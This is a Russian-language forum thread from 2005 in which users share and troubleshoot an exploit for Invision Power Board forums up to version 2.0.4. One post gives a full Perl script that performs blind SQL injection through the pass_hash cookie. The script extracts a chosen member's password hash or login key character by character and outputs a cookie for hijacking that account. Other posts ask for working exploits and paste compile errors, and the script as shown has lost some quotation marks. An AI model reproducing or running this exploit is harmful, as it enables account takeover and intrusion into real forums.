так вроде в ксплойте написанно <2.0.4 тоесть если я так понял то 2.0.4 он уже несможет =)) до 2.0.4 версии сможет а саму нет
21.07.2005 19:52:10
так вроде в ксплойте написанно <2.0.4 тоесть если я так понял то 2.0.4 он уже несможет =)) до 2.0.4 версии сможет а саму нет
|
|
|
|
22.07.2005 01:52:08
Только что проверил, ipb_skides.txt работает на 2.0.4!
|
|
|
|
22.07.2005 02:54:02
|
|
|
|
22.07.2005 16:13:30
Подскажите кто-нибудь че это значит:
ID 1 Password ****************************** ? |
|
|
|
24.07.2005 23:01:00
Нафига??? Интересно, не лень народу до сих пор на каждую дыру патчи кропать? Каменный век, однако [IMG] |
|||
|
|
27.07.2005 19:10:02
Блин ну правда . Постояно тута не рабочие эексплойты. Что скрипт кидесов чтоль боятся все ? =) Вобщем канчайте всякую лажу выкладывать =) давай те нам рабочие эксплойт =)
|
|
|
|
29.07.2005 06:08:22
блин нашел че за шняга, нету этого самого UserAgent...
может кто подскажет где взять его можно? |
|
|
|
29.07.2005 10:30:46
|
|||
|
|
30.07.2005 12:32:03
вот пофиксенный :
#!/usr/bin/perl -w # This one actually works Just paste the outputted cookie into # your request header using livehttpheaders or something and you # will probably be logged in as that user. No need to decrypt it! # Exploit coded by "ReMuSOMeGa & Nova" and # edited by rav3n use IO::Socket; if (!$ARGV[0]) {$ARGV[0] = ;} if (!$ARGV[3]) {$ARGV[3] = ;} my $host = $ARGV[0]; # hostname my $path = $ARGV[1] . index.php?act=Login&CODE=autologin; my $user = $ARGV[2]; # userid to jack my $iver = $ARGV[3]; # version 1 or 2 if($ARGV[4]) { $cpre = $ARGV[4] } else { $cpre = "" } my $dbug = $ARGV[5]; # debug? if (!$ARGV[3]) { print "... By rav3n Usage: ipb_skides.pl site.org /forum/ [id] [ver1/2] [cookie_prefix] [debug].\n\n"; exit; } my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e" ,"f"); my $outputs = ; M1: for( $i=1; $i < 33; $i++ ) { for( $j=0; $j < 16; $j++ ) { my $current = $charset[$j]; my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$curre nt%2527)/*" : "99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%25 27$current%2527)/*"; $cookie = $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "FAILED\n\n"; print $socket "GET $path HTTP/1.1\n"; print $socket "Host: $host\n"; print $socket "Accept: */*\n"; print $socket "Cookie: $cookie\n"; print $socket "Connection: close\n\n"; # If we get a valid sql request then this # does not appear anywhere in the Location header $pattern = act=Login&CODE=; $failed = 0; while(<$socket>) { if($dbug) { print }; if(/$pattern/) { $failed = 1; } } if($failed==0){ $outputs .= $current; print "$i char: $current\n"; next M1; } } if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; } } print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs; exit; |
|
|
|
30.07.2005 13:10:46
HERo!n
а почему у меня даже 5 строчек принт не выводит? |
|
|
|
30.07.2005 18:12:46
|
|||
|
|
01.08.2005 12:08:12
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
|
|||
|
|
01.08.2005 18:21:34
|
|||
|
|
02.08.2005 00:01:21
Народ я не знаю как у вас а у меня всё пашет...
Я просто изменил Login на Вход но в кодировке Win-1251 Что то какие-то цифорки побежали.... |
|
|
|
06.08.2005 00:17:07
чо за супер модификация?
Unquoted string "php" may clash with future reserved word at ipb.pl line 16. Unquoted string "act" may clash with future reserved word at ipb.pl line 16. Operator or semicolon missing before &CODE at ipb.pl line 16. Ambiguous use of & resolved as operator & at ipb.pl line 16. Unquoted string "autologin" may clash with future reserved word at ipb.pl line 16. Unquoted string "act" may clash with future reserved word at ipb.pl line 48. Operator or semicolon missing before &CODE at ipb.pl line 48. Ambiguous use of & resolved as operator & at ipb.pl line 48. syntax error at ipb.pl line 12, near "= ;" syntax error at ipb.pl line 13, near "= ;" Not enough arguments for index at ipb.pl line 16, near "index." syntax error at ipb.pl line 16, near "autologin;" syntax error at ipb.pl line 28, near "= ;" syntax error at ipb.pl line 48, near "=;" Execution of ipb.pl aborted due to compilation errors. |
|
|
|
10.08.2005 13:27:57
ну никто не выложит рабочий ?
|
|
|
|
12.08.2005 00:25:05
Вот я попробовал эксплоит... вроде работает у меня дома, только в инете не пашет =(((
Вот смотрите |
|
|
|
29.08.2005 10:56:02
Can't locate IO/Socket.pm in @INC (@INC contains: .) at 1.pl line 37.
BEGIN failed--compilation aborted at 1.pl line 37. У мя пишет вот эту батву. Как профиксить эту проблему с сокетом? Не работает ни в одной версии перла. |
||||
|
|
|||